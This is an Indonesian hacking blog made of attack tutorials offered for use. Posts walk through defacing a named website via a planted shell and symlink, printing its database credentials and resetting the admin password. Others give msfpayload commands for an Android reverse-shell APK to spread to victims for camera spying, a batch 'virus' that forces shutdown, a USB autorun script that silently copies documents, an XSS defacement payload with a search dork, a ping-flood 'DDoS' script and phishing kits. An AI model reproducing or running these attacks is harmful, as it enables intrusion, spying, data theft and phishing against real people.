Tutorial Deface Website Dengan Teknik Symlink

Pertama masuk ke Shell yang sudah di tanam di web target.

lalu upload Sym.php ( Digunakan untuk SYMLINK ).
Klo belum punya silahkan Download Disini
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho5qmAzBVChMUcQyJo2HgOTADpi1dml_DyYZZzeqGbdpZqP709C4d680jxNRfnZHiaoz4liKIwq85_KAEobUWq5Vh64ry0pEYPrL9a2Ur4CO1n2H412Y05WgV6J8mvyh1oK5RrB5VnEISe/s1600/s1.JPG 


 Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.
Selanjutnya akses / buka symlink yang telah agan upload.














Lalu klik user & domain & symlink.







Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyZv7m2pWq8-Ze3aLCmj_u4RsGSXoMREC3gbV7FEyKXAomJVFp9hXaME68KjPrLArobdDUjed1bwT2aaT-5AHIQXRsiMzTK6HY9u_5NOESoagtj_J78xtTsJIbzLNbicJ87aXWVU8OiqUi/s1600/s4.JPG
Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.
Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.







Perhatikan baris ini :
define('DB_HOST', 'localhost');


DB NAME = thefussy_wrdp3


DB USER = thefussy_wrdp3


DB PASSWORD = CZyLRz1EuwSd


DB HOST = localhost

Diatas adalah informasi mengenai Akses Database MySQL.


Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.






Klik koneksi MySQL.



















Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.


Jika di dalam shell agan tidak ada menu Koneksi MySQL Download lalu Upload , akses dan login.








 Lalu, saya klik "wp_user".






Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja
Agan buat password dalam bentuk MD5 Disini .




Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a






Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.
Berarti saya akan login dengan username admin dan password 121212.

Sekarang kita coba sob.





Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin


Saya login & wauuuuu, kereennn sob.


Saya berhasil masuk.
Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak
 
~Selamat Mencoba ~

Diposting oleh laban di 03.20.00 0 komentar

 

Cara Hacking android dengan Metasploit

Bahan - Bahan:

  1. Metasploit framework (kali linux)
  2. Smartphone Android
ada kan apa aja yang harus di butuhinnya? kalau ada langsung aja kita mulai.

  1.Buat Exploitnya
 Kita akan menggunakan Metasploit payload framework untuk membuat exploitnya pada tutorial kali ini, dengan cara menjalankan perintah di bawah ini untuk membuat exploitnya.


msfpayload android/meterpreter/reverse_tcp LHOST=IP_Kalian LPORT=Port_kalian R > hack.apk

Catatan : inget kalian harus mengganti IP_Kalian dan Port_Kalian dengan IP dan Port yang kalian miliki jangan asal copas terus jalanin aja wkwkwkwk. Tapi saya saranin kalo portnya pake port 443 aja.

  2. Persiapan Handler
 Persiapkan Handler untuk menghandle koneksi yang masuk dari korban tadi, di payload kita menggunakan port 443, kenapa? Karena kebanyakan firewall mengijinkan jaringan tersebut dan tidak mendeteksi sebagai ancaman. Buka Metasploit console dengan menjalankan perintah di bawah ini.

msfconsole
 



3.Membuat Handler
 Jika Metasploit console sudah terbuka saatnya kita membuat handlernya.

Masukan perintah ini untuk menggunakan handlernya.

 #use exploit/multi/handler
 lalu masukan yang ini, pastikan payloadnya sama ya.

 #set payload android/meterpreter/reverse_tcp

4. Konfigurasi Metasploit
 saatnya kita menkonfigurasi Payloadnya, silahkan konfig sesuai data yang kalian miliki.

set lhost IP_Kalian
set lport Port_Kalian

Yap handlernya sudah jalan mas bro.
 
 Catatan : Sekali lagi inget jangan asal copas.

4.  Sebar file APKnya
 Nah exploit udah jadi handler juga udah jadi sekarang adalah bagian tersulit dalam proses Hack ponsel android ini [ CCCCiiiiiieeeee hack cccciiiiiieeeeeeeeee], dan sekaligus menjadi faktor kesuksesan kalian, kalian bisa sebar file apknya lewat sosial media, blog, forum, atau apa pun itu sebisa kalian, kata kata nya harus yang meyakinkan kaya waktu meyakinkan cewe kalian #EHHHH

5. Ketika ada korban yang menginstal
 Ketika ada korban yang menginstal apknya bakal muncul kaya gini bro tampilan di Metasploit Consolenya.



 6. Terserah mau di apain
 Kalo udah ada korban yang udah nginstal silahkan kalian mau apain hpnya, contohnya mengambil foto dengan kamera hp korban. Untuk mengambil foto atau gambar dengan kamera hp korban silahkan masukan dan jalankan tentunya kode di bawah ini\

webcam_list (untuk melihat ada kamera apa aja yang tersedia di hpnya)
webcam_snap (Untuk mengambil gambar dari hp korban)



 7. Eng ing eng........
 Inilah foto yang berhasil di ambil dengan kamera di hp korban

Diposting oleh laban di 02.25.00 0 komentar

 

How To Access The Dark Web

Apakah Anda mencoba untuk mencari tahu bagaimana untuk mengakses web gelap? Yah tidak terlihat lagi, kami telah pergi dan melakukan penelitian sehingga kita bisa menampilkan yang terbaik dan paling aman untuk mengakses web dalam.
Menurut peneliti hanya 4% dari internet dapat dilihat oleh masyarakat umum.penggunaan TOR Anda sedang diawasi
Yang berarti bahwa sisa 96% dari internet terdiri dari "The Deep Web".
Gelap Web atau gelap Net adalah bagian dari web yang mendalam.
Jika Anda mencari untuk mengakses pasar tersembunyi atau situs net yang mendalam (dengan domain .onion) itu dilakukan dengan menggunakan jaringan TOR dan bundel browser.
Hal ini sangat mudah untuk mengakses web gelap, tetapi jika Anda baru ke web dalam, panduan ini akan membantu Anda dalam perjalanan Anda.
Harap Catatan: Ini hanya panduan dasar untuk mengakses web dalam. Itu tidak menjamin anonimitas!
Jika Anda menggunakan TOR untuk sesuatu yang jahat, Anda harus berpikir serius tentang privasi dan keamanan. Jolly Roger telah mengumpulkan panduan yang komprehensif tentang bagaimana untuk tetap aman di web dalam, melihat panduan di sini.
KHUSUS anonimitas TIP: Anda harus mengambil anonimitas Anda sangat serius jika Anda mengunjungi Deep Web dan terutama jika Anda melihat setiap Markets Darknet.
Hal pertama yang harus Anda lakukan sebelum melakukan apapun semakin diri Anda VPN. ISP dan Instansi Pemerintah pelacakan dan penebangan semua yang Anda lakukan secara online sekarang sehingga tidak membuat mudah bagi mereka untuk menangkap Anda.
Mereka akan melacak yang download Tor, ISP sudah masuk penggunaan dan lembaga Tor Anda seperti DEA dan NSA akan menggali melalui data dengan seksama.
Jika Anda menggunakan VPN baik yang membuat tidak ada log maka lalu lintas internet Anda benar-benar terenkripsi sehingga tidak bahkan ISP atau Penegakan Hukum bahkan akan tahu bahwa Anda menggunakan Tor apalagi melihat Darknet Markets.
Cari VPN baik dan murah di sini:  https://darkwebnews.com/DeepWebVPN
 Cara Akses The Dark Web Gratis
Anda tidak dapat mengakses web dalam hanya menggunakan browser umum seperti Internet Explorer atau Google Chrome, Anda perlu men-download bundel TOR browser. Hanya mendapatkannya dari situs TOR resmi, tidak pernah men-download dari tempat lain!

Cara Akses The Dark Web Gratis

Anda tidak dapat mengakses web dalam hanya menggunakan browser umum seperti Internet Explorer atau Google Chrome, Anda perlu men-download bundel TOR browser. Hanya mendapatkannya dari situs TOR resmi, tidak pernah men-download dari tempat lain!

Cari download di sini:  https://www.torproject.org/download/download.html
Diposting oleh laban di 03.29.00 0 komentar

 

TechCrunch hacked for security check


 


Situs teknologi terkenal, TechCrunch menjadi korban terbaru dari kelompok hacker, OurMine.
Kelompok ini menggambarkan dirinya sebagai 'kelompok hacker elit yang dikenal selama bertahun-hacks menunjukkan kerentanan dalam sistem utama'. Untuk beberapa waktu mereka sudah terkenal mengorbankan selebriti profil tinggi rekening Twitter dan DDoS-ing sifat panas seperti Pokemon Go.

 OurMine Keamanan memperoleh akses penerbitan ke situs Verizon milik, yang menggunakan populer sistem manajemen konten Wordpress, dan diposting pesan sekarang terkenal nya. Daripada benar-benar mengotori situs, OurMine memilih bukan untuk hanya posting berita untuk menunjukkan bahwa CMS telah dilanggar.
Kelompok itu mengatakan bahwa hack situs untuk memeriksa keamanan. Sebuah posting di situs di bawah byline penulis yang berbasis di Seattle Devin Coldewey mengatakan: "Hello Guys, jangan khawatir kita hanya menguji keamanan TechCrunch, kami tidak mengubah password, silahkan hubungi kami." Cerita muncul di atas TechCrunch dengan, spanduk merah yang sangat-terlihat besar.

The OurMine postingan muncul di sekitar 5:10 namun dilepas dalam waktu dua jam. Itu masih menunjukkan indeks dan cache Google pada saat penulisan. Tidak butuh waktu lama TechCrunch untuk melihat dan menghapus cerita.

otentikasi multi-faktor adalah keamanan tingkat dasar untuk setiap organisasi berita. TechCrunch mengakui bahwa re-digunakan password harus telah berperan untuk hack ini. Berbagi password antara situs dan layanan adalah yang terburuk.
Diposting oleh laban di 23.52.00 0 komentar

 

Perbedaan White hat hacker Dan Black hat hacker



White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.
Black hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yaitu mereka yang menerobos keamanan sistem komputer tanpa ijin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk me
Diposting oleh laban di 23.39.00 1 komentar

 

Cara Membuat Virus Dengan Notepad

-Pertama Buka Notepad
-Lalu CoPas Script Dibawah ini

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM CATUREKO!!!
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +627840xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo Semua Proses Selesai
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS TELAH MEMASUKI PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Yang Sabar Aja Bro Wkwkwkwkwkwk
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “Selamat Tinggal Kawan”

-Save As Beri nama Virus76.bat
-Jangan Nyoba Di Klik  Ntar Ribet Bro..
Selamat Mencoba Bro Semoga Berhasil 
Diposting oleh laban di 02.28.00 0 komentar

 

Free Download HOIC For Attacker



Download Disini
Diposting oleh laban di 03.56.00 0 komentar

 

Cara Mengambil Data Dari Flashdisk





Persiapan : - Flashdisk Ukuran 8 GB

1.Buka Notepad, Copy dan Paste Kode ini :

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save di Flashdisk Dengan Nama autorun.inf

2. Buka Lagi Notepad Baru, Copy Lagi Kode ini :
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
@echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off cls

Save dengan nama : file.bat

3. Buka Notepad lagi dan copy lagi kode ini :
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save Dengan Nama invisible.vbs

4. Buka Notepad lagi lol Copy Lagi kode ini :

wscript.exe \invisible.vbs file.bat
SAVE dengan nama launch.bat

5. Lalu buat folder baru dengan nama all untuk menyimpan hasil curiannya biggrin

Silahkan Coba Di PC Anda Atau Di Warnet
Diposting oleh laban di 03.38.00 0 komentar

 

Tutorial Deface Teknik XSS

XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code ( Code Injection Attack ), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.

Dork: inurl:"/showcatrows.php?CategoryID="

Gunakan dork diatas untuk mencari target di google.
Contoh : http://www.paypalshop.org/showcatrows.php?CategoryID=5

Lalu tambahkan script HTML atau Javascript anda di akhir URL
"><marquee><h1>Hacked By Laban</h1></marquee> lalu tekan enter
Diposting oleh laban di 04.26.00 0 komentar

 

Cara Mudah Membuat DDOS Dengan Notepad



Cara Membuat :

 1. Buka notepada sobat Start > All Programs > Accessories > Notepad.

 2. Copy code/script berikut di bawah ini kedalam notepad anda.
@echo off
    mode 87,30
    title DDOS By :Laban Hacker
    color 4
    cls
    echo.
    echo ++++++++++++++++++++++++
    echo +       laban76.blogspot.com      +
    echo ++++++++++++++++++++++++
    echo.
    set /p x=Website Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=Masukkan IP Target:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color c
    echo Lumpuhkan Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS



 3. Setelah dicopy silahkan anda simpan file DDoS tersebut  File > Save.

 4. Beri nama File Name anda tadi dengan akhiran .bat (misal DDoS.bat).

 5. Text Document (*,txt) anda ganti dengan All File


Diposting oleh laban di 04.14.00 0 komentar

 

Download Kumpulan Script Phising




Fiture
-Phising Facebook Berbagai Versi
-Phising Gmail
-Phising Paypal
-Phising Gemscool
Password : laban76.blogspot.com
Download  disini
Diposting oleh laban di 03.56.00 0 komentar

 

Download Script Phising Garena Redeem Kode




Tutorial :
Download  Disini
Login Hosting Disini  Disini
Extract rar yg tadi didownload
Buka Mail.php,lalu tuliskan email kalian disitu
saya sarankan gunakan Gmail


Note : Yang lain jangan diedit nanti error
Diposting oleh laban di 00.47.00 2 komentar

 
Langganan: Komentar (Atom)